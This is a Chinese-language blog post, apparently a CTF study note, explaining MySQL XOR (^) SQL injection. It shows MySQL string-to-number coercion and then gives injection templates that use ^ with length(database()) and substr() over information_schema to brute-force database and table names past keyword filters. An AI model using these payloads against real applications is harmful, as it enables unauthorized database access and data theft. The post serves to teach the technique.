
<!DOCTYPE html>
<html lang="zh ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FHK_KMD终晨 || _coding_</title>
    <meta name="author" content="FHK_KMD6377">
    <meta name="description" content="所有所得所获,不如一夜星空 ------<<三体导读>> ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/images/avatar.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>加载过慢请开启缓存(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">FHK_KMD终晨</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/like/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/like/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
        <a target="_blank" rel="noopener" href="https://en.korilin.com">
            <span>
                <a-icon type="compass" theme="filled" />
            </span>
            <span>英文博客</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>FHK_KMD终晨</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/like/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/like/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
            <a target="_blank" rel="noopener" href="https://en.korilin.com">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="compass" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">英文博客</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1> </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2024/9/23
        </span>

        

        
    </div>

    <div class="content" v-pre>
        <p>在介绍异或注入之前，先看看这个</p>
<pre><code>mysql&gt; select &#39;aaa&#39;=0;
+---------+
| &#39;aaa&#39;=0 |
+---------+
|       1 |
+---------+
1 row in set, 1 warning (0.00 sec)
#这里可以看到返回结果是1，表示true

mysql&gt; select &#39;aaa&#39;=1;
+---------+
| &#39;aaa&#39;=1 |
+---------+
|       0 |
+---------+
1 row in set, 1 warning (0.00 sec)
#但这里返回的是false
</code></pre>
<p>查阅了相关文档后，发现这样一个特性。</p>
<p><strong>在做string和数字型的值比较的时候，string会转换成数字，对于前面是数字的字符串，转换的时候就是转换成前面的数字，而前面不是以数字开头的字符串，转换的时候自然就是转换成0了，可以再看看下面两个例子。</strong></p>
<pre><code>mysql&gt; select &#39;1aaa&#39;=1;
+----------+
| &#39;1aaa&#39;=1 |
+----------+
|        1 |
+----------+
1 row in set, 1 warning (0.00 sec)

mysql&gt; select &#39;12aaa&#39;=1;
+-----------+
| &#39;12aaa&#39;=1 |
+-----------+
|         0 |
+-----------+
1 row in set, 1 warning (0.00 sec)
</code></pre>
<p>下面进入正题</p>
<h2 id="什么是异或注入"><a href="#什么是异或注入" class="headerlink" title="什么是异或注入"></a>什么是异或注入</h2><p>异步注入说简单一点就是在构造where后面的判断条件时使用^（异或符号）来达到sql注入攻击的目的，通常异步注入与一些自动化脚本比如bp中的intrude模块或者自己写一个python脚本来配合使用。可以来看个例子。    </p>
<pre><code>mysql&gt; select * from student;
+-----------+--------+------+------+-------+
| Sno       | Sname  | Ssex | Sage | Sdept |
+-----------+--------+------+------+-------+
| 201215121 | 李勇   | 男   |   23 | CS    |
| 201215122 | 刘晨   | 女   |   20 | CS    |
| 201215123 | 王敏   | 女   |   19 | MA    |
| 201215125 | 张立   | 男   |   20 | IS    |
| 200215128 | 陈冬   | 男   |   19 | IS    |
| 201515000 | 小赵   | 男   |   31 | IS    |
| 201515001 | 小钱   | 女   |   29 | MA    |
| 201515002 | 小孙   | 男   |   34 | MJ    |
| 201515003 | 小李   | 女   |   26 | CS    |
| 201515004 | 小周   | 男   |   42 | LI    |
+-----------+--------+------+------+-------+
10 rows in set (0.07 sec)

#这个是student表的内容
</code></pre>
<p>但如果我这样构造sql查询语句的话</p>
<pre><code>mysql&gt; select * from student where Sname=&#39;李勇&#39;^1;
Empty set, 11 warnings (1.65 sec)

mysql&gt; select * from student where Sname=&#39;李勇&#39;^0;
+-----------+--------+------+------+-------+
| Sno       | Sname  | Ssex | Sage | Sdept |
+-----------+--------+------+------+-------+
| 201215121 | 李勇   | 男   |   23 | CS    |
| 201215122 | 刘晨   | 女   |   20 | CS    |
| 201215123 | 王敏   | 女   |   19 | MA    |
| 201215125 | 张立   | 男   |   20 | IS    |
| 200215128 | 陈冬   | 男   |   19 | IS    |
| 201515000 | 小赵   | 男   |   31 | IS    |
| 201515001 | 小钱   | 女   |   29 | MA    |
| 201515002 | 小孙   | 男   |   34 | MJ    |
| 201515003 | 小李   | 女   |   26 | CS    |
| 201515004 | 小周   | 男   |   42 | LI    |
+-----------+--------+------+------+-------+
10 rows in set, 11 warnings (0.00 sec)
</code></pre>
<p><strong>为什么会是这个结果呢？</strong><br>首先’李勇’^1做异或运算，结果会是1，因为该字符串转换成数字就是0，然后看看Sname&#x3D;0这个表达式，我们不妨把每个元组都拿过来一个一个比较，每个元组的Sname转换成数字都是0，所以对于每个元组，该where后面的判断条件全部都是成立的，而Sname&#x3D;1这个表达式自然就是都不成立。</p>
<h2 id="如何利用异或运算来进行注入？"><a href="#如何利用异或运算来进行注入？" class="headerlink" title="如何利用异或运算来进行注入？"></a>如何利用异或运算来进行注入？</h2><p>我们可以构造一条这样的sql语句</p>
<pre><code>mysql&gt; select * from student where Sname=&#39;李勇&#39;^(length(database())!=$变量$);
</code></pre>
<p>通过构造这样类似的sql语句就可以得到当前数据库名的长度，也可以将语句稍微改改，通过脚本爆破出数据库名表名等，这里我就不演示太多了。</p>
<pre><code>#查询数据库名
mysql&gt; select * from student where Sname=&#39;李勇&#39;^(substr(database(),$变量1$,1)!=$变量2$);

#查询表名
mysql&gt; select * from student where Sname=&#39;李勇&#39;^(substr((select table_name from information_schema.tables where table_schema=database() limit $变量1$,1),$变量2$,1)!=$变量3$);
</code></pre>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通常目标服务器没有对^符号进行过滤的时候，都可以尝试使用异或注入。之前我就遇到了一个把and,or,||,&amp;&amp;,union,select,注释等这些关键字都给过滤了的靶机，不过没有过滤掉异或符号，如果不知道有异或注入这种操作，这个靶机估计又要卡好久。。。学网安感觉很难有成就感，这并不是学一段时间就能做出一个东西出来的一门学科，并且很难看到自己的进步，每次做ctf的题目或是靶机，总能遇到以前从来没有见过的技术。麻了，睡觉去了。</p>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © FHK新行星纪元637年 - 2024 FHK_KMD终晨
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @FHK_KMD6377
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'en',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>

</body>

</html>